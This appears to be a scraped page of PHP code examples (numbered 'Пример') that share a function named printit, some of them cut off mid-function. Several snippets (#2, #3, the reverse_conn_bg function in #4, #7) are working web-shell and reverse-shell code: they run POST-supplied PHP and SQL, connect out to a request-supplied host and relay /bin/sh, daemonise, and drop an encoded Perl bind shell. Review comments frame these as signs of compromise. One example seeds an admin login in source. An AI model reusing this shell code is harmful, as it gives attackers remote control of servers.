Пример #1
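/**
 * Read the report parameters from the request and print the selected sales orders.
 *
 * PARAM_0 .. PARAM_6 are taken from $_REQUEST unchanged and passed on to printit();
 * nothing is validated or cast here, so printit() must treat every value as
 * untrusted input. Nothing is printed unless the starting order number is > 0.
 */
function print_sales_orders()
{
    // `?? null` keeps an absent parameter from raising an undefined-index warning;
    // the values themselves are still raw request data.
    $from = $_REQUEST['PARAM_0'] ?? null;
    $to = $_REQUEST['PARAM_1'] ?? null;
    $currency = $_REQUEST['PARAM_2'] ?? null;
    $bankaccount = $_REQUEST['PARAM_3'] ?? null;
    $email = $_REQUEST['PARAM_4'] ?? null;
    $quote = $_REQUEST['PARAM_5'] ?? null;
    $comments = $_REQUEST['PARAM_6'] ?? null;
    if ($from == null) {
        $from = 0;
    }
    if ($to == null) {
        $to = 0;
    }
    if ($from > 0) {
        // The original passed $bank and $commeents, neither of which exists in this
        // scope, so the bank account and comments from the request were silently
        // replaced by null. Pass the variables that were actually read above.
        printit($from, $to, $currency, $bankaccount, $email, $quote, $comments, "");
    }
}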
Пример #2
        }
        $input = fread($pipes[1], $chunk_size);
        if ($debug) {
            printit("STDOUT: {$input}");
        }
        fwrite($sock, $input);
    }
    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) {
            printit("STDERR READ");
        }
        $input = fread($pipes[2], $chunk_size);
        if ($debug) {
            printit("STDERR: {$input}");
        }
        fwrite($sock, $input);
    }
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit($string)
{
    if (!$daemon) {
        print "{$string}\n";
Пример #3
 /**
  * Request dispatcher: routes on $_POST['cmd'] and, inside each tool, on $_POST['method'].
  *
  * NOTE(review): every branch acts on raw POST fields. The visible branches browse
  * paths, hand a field to Util::execute(), hand a field to MySQLTools::execute(),
  * and open an outbound connection wired to /bin/sh. That combination is the
  * behaviour of a web shell: when this code turns up on a server it should be
  * handled as evidence of compromise (preserve the file, review access logs for
  * POSTs carrying these field names), not as an application to maintain.
  */
 function __construct()
 {
     // The login page is built only when all three tests are true; in every other
     // case the request continues to the dispatcher below.
     // NOTE(review): the three array reads are not guarded by isset(), so a bare
     // request raises undefined-index notices.
     if ($_SESSION['logged'] != TRUE && $_POST['cmd'] != 'login' && empty($_POST['pass'])) {
         $this->buildPageLogin();
     } else {
         switch ($_POST['cmd']) {
             case 'browser':
                 // 'item' is a request-supplied value passed straight to
                 // BrowserTools::main(); the meaning of the second argument is not
                 // visible in this method.
                 $browserTools = new BrowserTools();
                 switch ($_POST['method']) {
                     case 'show':
                         $this->buildPageStructure($browserTools->main($_POST['item'], false));
                         break;
                     case 'execute':
                         $this->buildPageStructure($browserTools->main($_POST['item']));
                         break;
                     default:
                         $this->buildPageStructure($browserTools->main('.'));
                         break;
                 }
                 break;
             case 'logout':
                 $this->logout();
                 break;
             case 'remove':
                 $this->remove();
                 break;
             case 'php':
                 $phpTools = new PhpTools();
                 switch ($_POST['method']) {
                     case 'execute':
                         // Util::execute() receives the POST field unchanged; presumably
                         // it evaluates it (implementation not shown here). Each output
                         // row is wrapped at 100 columns and HTML-escaped before display.
                         // NOTE(review): $resp is never initialised, so an empty $run
                         // leaves it undefined when passed to main().
                         $util = new Util();
                         $run = $util->execute($_POST['item']);
                         foreach ($run as $row) {
                             $resp[] = htmlentities(wordwrap($row, 100, ' ', TRUE), ENT_QUOTES);
                         }
                         $this->buildPageStructure($phpTools->main($resp));
                         break;
                     default:
                         $this->buildPageStructure($phpTools->main(''));
                         break;
                 }
                 break;
             case 'mysql':
                 $mySql = new MySQLTools();
                 switch ($_POST['method']) {
                     case 'connect':
                         // Connection settings from the request, database password
                         // included, are copied into the session as-is.
                         if (!empty($_POST['userdb']) && !empty($_POST['serverdb']) && !empty($_POST['portdb'])) {
                             $_SESSION['userdb'] = $_POST['userdb'];
                             $_SESSION['passdb'] = $_POST['passdb'];
                             $_SESSION['serverdb'] = $_POST['serverdb'];
                             $_SESSION['portdb'] = $_POST['portdb'];
                             if ($mySql->connect()) {
                                 $_SESSION['connected'] = TRUE;
                                 $this->buildPageStructure($mySql->main());
                             } else {
                                 // connect_error is concatenated into markup without escaping.
                                 $error = "\n                                       <div class='alert'>\n                                           <strong>Warning!</strong> " . $_SESSION['linkdb']->connect_error . "\n                                       </div>\n                                   ";
                                 $this->buildPageStructure($mySql->main($error));
                             }
                         }
                         break;
                     case 'selectdb':
                         if (!empty($_POST['item'])) {
                             $_SESSION['db'] = $_POST['item'];
                             if ($mySql->selectDb($_POST['item'])) {
                                 $this->buildPageStructure($mySql->main());
                             } else {
                                 $error = "\n                                       <div class='alert'>\n                                           <strong>Warning!</strong> Can't select the Database. Please try again.\n                                       </div>\n                                   ";
                                 $this->buildPageStructure($mySql->main($error));
                             }
                         }
                         break;
                     case 'query':
                         // 'item' goes to MySQLTools::execute() unchanged; presumably it
                         // is run as a SQL statement (implementation not shown here).
                         if (!empty($_POST['item'])) {
                             if ($result = $mySql->execute($_POST['item'])) {
                                 $_SESSION['query'] = $result;
                                 $this->buildPageStructure($mySql->main());
                             } else {
                                 // The driver error text is concatenated into markup without escaping.
                                 $error = "\n                                       <div class='alert'>\n                                           <strong>Warning!</strong> " . $_SESSION['linkdb']->error . "\n                                       </div>\n                                   ";
                                 $this->buildPageStructure($mySql->main($error));
                             }
                         }
                         break;
                     case 'logout':
                         // Clears every database-related session key set by the branches above.
                         $_SESSION['connected'] = NULL;
                         $_SESSION['userdb'] = NULL;
                         $_SESSION['passdb'] = NULL;
                         $_SESSION['serverdb'] = NULL;
                         $_SESSION['portdb'] = NULL;
                         $_SESSION['db'] = NULL;
                         $_SESSION['linkdb'] = NULL;
                         $this->buildPageStructure($mySql->main());
                         break;
                     default:
                         $this->buildPageStructure($mySql->main());
                         break;
                 }
                 break;
             case 'reverse':
                 $reverseTools = new ReverseTools();
                 switch ($_POST['method']) {
                     case 'connect':
                         // Connects out to the host and port named in the request, starts
                         // /bin/sh with pipes on stdin/stdout/stderr, and copies bytes in
                         // both directions until the socket or the shell's stdout closes.
                         // Defender view: a web-server worker that holds an outbound TCP
                         // connection and has a shell as a child process is the signal to
                         // alert on; default-deny egress from the web tier and disabling
                         // proc_open in php.ini both stop this branch from working.
                         if (isset($_POST['port']) && isset($_POST['ip']) && $_POST['port'] != "" && $_POST['ip'] != "") {
                             $result = "";
                             $ip = $_POST['ip'];
                             $port = $_POST['port'];
                             $chunk_size = 1400;
                             $write_a = null;
                             $error_a = null;
                             $shell = 'uname -a; /bin/sh -i';
                             $debug = 0;
                             // Changes the process-wide working directory and file-creation mask.
                             chdir("/");
                             umask(0);
                             $sock = fsockopen($ip, $port, $errno, $errstr, 30);
                             if (!$sock) {
                                 echo "{$errstr} ({$errno})";
                                 exit(1);
                             }
                             $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
                             $process = proc_open($shell, $descriptorspec, $pipes);
                             if (!is_resource($process)) {
                                 echo "ERROR: Can't spawn shell";
                                 exit(1);
                             }
                             stream_set_blocking($pipes[0], 0);
                             stream_set_blocking($pipes[1], 0);
                             stream_set_blocking($pipes[2], 0);
                             stream_set_blocking($sock, 0);
                             // NOTE(review): $result is built up below but is not passed to
                             // buildPageStructure() afterwards, so it looks unused.
                             $result .= "Successfully opened reverse shell to {$ip}:{$port}";
                             while (1) {
                                 if (feof($sock)) {
                                     $result .= "ERROR: Shell connection terminated";
                                     break;
                                 }
                                 if (feof($pipes[1])) {
                                     $result .= "ERROR: Shell process terminated";
                                     break;
                                 }
                                 // A null timeout makes stream_select() block until a stream
                                 // is readable, so the HTTP request stays open for the whole
                                 // session: unusually long-lived requests are a second signal.
                                 $read_a = array($sock, $pipes[1], $pipes[2]);
                                 $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
                                 // printit() is not defined in this method; with $debug = 0
                                 // none of the calls below are reached.
                                 if (in_array($sock, $read_a)) {
                                     if ($debug) {
                                         printit("SOCK READ");
                                     }
                                     $input = fread($sock, $chunk_size);
                                     if ($debug) {
                                         printit("SOCK: {$input}");
                                     }
                                     fwrite($pipes[0], $input);
                                 }
                                 if (in_array($pipes[1], $read_a)) {
                                     if ($debug) {
                                         printit("STDOUT READ");
                                     }
                                     $input = fread($pipes[1], $chunk_size);
                                     if ($debug) {
                                         printit("STDOUT: {$input}");
                                     }
                                     fwrite($sock, $input);
                                 }
                                 if (in_array($pipes[2], $read_a)) {
                                     if ($debug) {
                                         printit("STDERR READ");
                                     }
                                     $input = fread($pipes[2], $chunk_size);
                                     if ($debug) {
                                         printit("STDERR: {$input}");
                                     }
                                     fwrite($sock, $input);
                                 }
                             }
                             fclose($sock);
                             fclose($pipes[0]);
                             fclose($pipes[1]);
                             fclose($pipes[2]);
                             proc_close($process);
                         }
                         $this->buildPageStructure($reverseTools->main());
                         break;
                     default:
                         $this->buildPageStructure($reverseTools->main(''));
                         break;
                 }
                 break;
             case 'login':
                 if (isset($_POST['pass']) && !empty($_POST['pass'])) {
                     $this->login($_POST['pass']);
                 }
                 break;
             default:
                 $info = new Info();
                 $this->buildPageStructure($info->main());
                 break;
         }
     }
 }
Пример #4
            }
            if ($flag == 2) {
                $pid = $sql->last_record($result);
                $sql->query("update program set stop=INTERVAL 1 DAY + stop where pid={$pid}");
            }
        }
        $count++;
    }
    // end while
}
// end function printit
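// Emit the page header only when $WEB is set.
if ($WEB) {
    print_header_open();
    print_title("Collecting ...");
    print_header_close();
}
// foreach replaces `while (list(...) = each(...))`: each() was deprecated in PHP 7.2
// and removed in PHP 8.0, so the original loop is a fatal error on current runtimes.
// The iteration order and the key/value pairs are the same.
foreach ($urls as $zender => $url) {
    // Per-channel buffers are reset on every pass; $film is not reset here and is
    // threaded through parsecontent() from one iteration to the next.
    $uur = array();
    $programma = array();
    $inhoud = array();
    if ($WEB) {
        // NOTE(review): $zender is printed into HTML unescaped. That is only safe
        // while $urls is a static, trusted list; confirm where it is built.
        print "Slurping {$zender}...<br>\n";
    }
    // Fetch the remote listing, parse it, then hand the parsed data to printit().
    $inhoud = connecttohttpd($url, $host);
    list($programma, $uur, $film) = parsecontent($inhoud, $programma, $uur, $film);
    printit($programma, $uur, $film, $zender);
}
if ($WEB) {
    print "done<br>";
    print_page_close();
}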
/**
 * Handle the "reverse connection" form of the tool this function belongs to.
 *
 * Depending on $_REQUEST['rev_option'] it either connects out to the host and
 * port given in the query string and relays a /bin/sh process over that socket,
 * or writes an embedded Perl script to disk and runs it with the given port.
 *
 * NOTE(review): both branches give a remote party an interactive shell running
 * as the web-server account. Finding this function on a server is an indicator
 * of compromise. Useful detection points visible in the code: the dropped file
 * name `indrajith_perl_bind.pl`, a web-server worker forking and calling
 * setsid(), and a shell or perl child process under the web server.
 */
function reverse_conn_bg()
{
    global $os;
    // All three values come straight from the request and are used unvalidated below.
    $option = $_REQUEST['rev_option'];
    $ip = $_GET['my_ip'];
    $port = $_GET['my_port'];
    if ($option == "PHP Reverse Shell") {
        echo "<div id=result><h2>RESULT</h2><hr /><br />";
        // Declared inside the branch, so it only exists once this branch has run;
        // running the branch twice in one request would redeclare it.
        // $daemon is not imported with `global`, so inside printit() it is an
        // unset local and the function always prints.
        function printit($string)
        {
            if (!$daemon) {
                print "{$string}\n";
            }
        }
        $chunk_size = 1400;
        $write_a = null;
        $error_a = null;
        $shell = 'uname -a; w; id; /bin/sh -i';
        $daemon = 0;
        $debug = 0;
        // When pcntl is available the parent exits and the child starts a new
        // session, detaching the shell from the HTTP request that launched it.
        // Defender view: pcntl_* is normally absent from web SAPIs; keeping it (and
        // proc_open) in disable_functions removes this capability.
        if (function_exists('pcntl_fork')) {
            $pid = pcntl_fork();
            if ($pid == -1) {
                printit("ERROR: Can't fork");
                exit(1);
            }
            if ($pid) {
                exit(0);
            }
            if (posix_setsid() == -1) {
                printit("Error: Can't setsid()");
                exit(1);
            }
            $daemon = 1;
        } else {
            printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
        }
        // Changes the process-wide working directory and file-creation mask.
        chdir("/");
        umask(0);
        // Outbound connection to the request-supplied endpoint (30 s connect timeout).
        // Default-deny egress from the web tier makes this call fail.
        $sock = fsockopen($ip, $port, $errno, $errstr, 30);
        if (!$sock) {
            printit("{$errstr} ({$errno})");
            exit(1);
        }
        $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
        $process = proc_open($shell, $descriptorspec, $pipes);
        if (!is_resource($process)) {
            printit("ERROR: Can't spawn shell");
            exit(1);
        }
        stream_set_blocking($pipes[0], 0);
        stream_set_blocking($pipes[1], 0);
        stream_set_blocking($pipes[2], 0);
        stream_set_blocking($sock, 0);
        // $ip and $port are echoed into the HTML response without escaping.
        printit("<font color=green>Successfully opened reverse shell to {$ip}:{$port} </font>");
        // Relay loop: socket -> shell stdin, shell stdout/stderr -> socket, until
        // the socket or the shell's stdout reaches EOF.
        while (1) {
            if (feof($sock)) {
                printit("ERROR: Shell connection terminated");
                break;
            }
            if (feof($pipes[1])) {
                printit("ERROR: Shell process terminated");
                break;
            }
            // A null timeout makes stream_select() block until a stream is readable.
            $read_a = array($sock, $pipes[1], $pipes[2]);
            $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
            if (in_array($sock, $read_a)) {
                if ($debug) {
                    printit("SOCK READ");
                }
                $input = fread($sock, $chunk_size);
                if ($debug) {
                    printit("SOCK: {$input}");
                }
                fwrite($pipes[0], $input);
            }
            if (in_array($pipes[1], $read_a)) {
                if ($debug) {
                    printit("STDOUT READ");
                }
                $input = fread($pipes[1], $chunk_size);
                if ($debug) {
                    printit("STDOUT: {$input}");
                }
                fwrite($sock, $input);
            }
            if (in_array($pipes[2], $read_a)) {
                if ($debug) {
                    printit("STDERR READ");
                }
                $input = fread($pipes[2], $chunk_size);
                if ($debug) {
                    printit("STDERR: {$input}");
                }
                fwrite($sock, $input);
            }
        }
        fclose($sock);
        fclose($pipes[0]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        proc_close($process);
        echo "<br /><br /><hr /><br /><br /></div>";
    } else {
        if ($option == "PERL Bind Shell") {
            global $bind_perl, $os;
            $pbfl = $bind_perl;
            // Writes the decoded, inflated contents of the global $bind_perl to a
            // fixed file name in the current directory. A file of this name created
            // by the web-server account is a file-integrity-monitoring hit.
            $handlr = fopen("indrajith_perl_bind.pl", "wb");
            if ($handlr) {
                fwrite($handlr, gzinflate(base64_decode($bind_perl)));
            } else {
                alert("Access Denied for create new file");
            }
            // NOTE(review): fclose() is reached even when fopen() failed.
            fclose($handlr);
            if (file_exists("indrajith_perl_bind.pl")) {
                // $port is interpolated into the command string without escaping;
                // cmd() is defined elsewhere and presumably runs it through a shell.
                if ($os == "nix") {
                    cmd("chmod +x indrajith_perl_bind.pl;perl indrajith_perl_bind.pl {$port}");
                } else {
                    cmd("perl indrajith_perl_bind.pl {$port}");
                }
            }
        }
    }
}
Пример #6
<?php

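// SECURITY: the login form fields are seeded before includes/session.inc is
// loaded, presumably so the session bootstrap signs in as this account without
// a login form (confirm against session.inc). A real password placed here is a
// credential stored in source: read it from the environment or a secret store,
// use a least-privilege reporting account rather than "admin", and keep this
// script outside any web-reachable directory.
$_POST["user_name_entry_field"] = "admin";
$_POST["company_login_name"] = "0";
$_POST["password"] = "******";
$page_security = 1;
include "includes/session.inc";
chdir("./sales");
# printing of orders/quotes is called from sales directory
include "../reporting/includes/reporting.inc";
include "../reporting/includes/pdf_report.inc";
include "../reporting/rep109.php";
// Constant query text: no request data is interpolated into it.
$sql = "SELECT sales_orders.order_no from sales_orders where order_no=20";
$result = db_query($sql, $db);
if ($result) {
    // $nr stays null when the query matches no row; the original then called
    // printit() with an undefined variable.
    $nr = null;
    while ($myrow = db_fetch($result)) {
        $nr = $myrow[0];
    }
    $bank = get_first_bank_account();
    $quote = 1;
    $comments = "";
    if ($nr !== null) {
        // NOTE(review): /tmp/output.pdf is a fixed name in a shared, world-writable
        // directory; another local user can pre-create it (for example as a
        // symlink) or read the report afterwards. Prefer a private output
        // directory with restrictive permissions.
        printit($nr, $nr, "CHF", $bank, 0, $quote, "", "/tmp/output.pdf");
    }
}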
Пример #7
 if (!is_resource($process)) {
     printit("ERROR: Can't spawn shell<br>");
     exit(1);
 }
 stream_set_blocking($pipes[0], 0);
 stream_set_blocking($pipes[1], 0);
 stream_set_blocking($pipes[2], 0);
 stream_set_blocking($sock, 0);
 printit("Successfully opened reverse shell to {$ip}:{$port}<br>");
 while (1) {
     if (feof($sock)) {
         printit("ERROR: Shell connection terminated<br>");
         break;
     }
     if (feof($pipes[1])) {
         printit("ERROR: Shell process terminated<br>");
         break;
     }
     $read_a = array($sock, $pipes[1], $pipes[2]);
     $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
     if (in_array($sock, $read_a)) {
         $input = fread($sock, $chunk_size);
         fwrite($pipes[0], $input);
     }
     if (in_array($pipes[1], $read_a)) {
         $input = fread($pipes[1], $chunk_size);
         fwrite($sock, $input);
     }
     if (in_array($pipes[2], $read_a)) {
         $input = fread($pipes[2], $chunk_size);
         fwrite($sock, $input);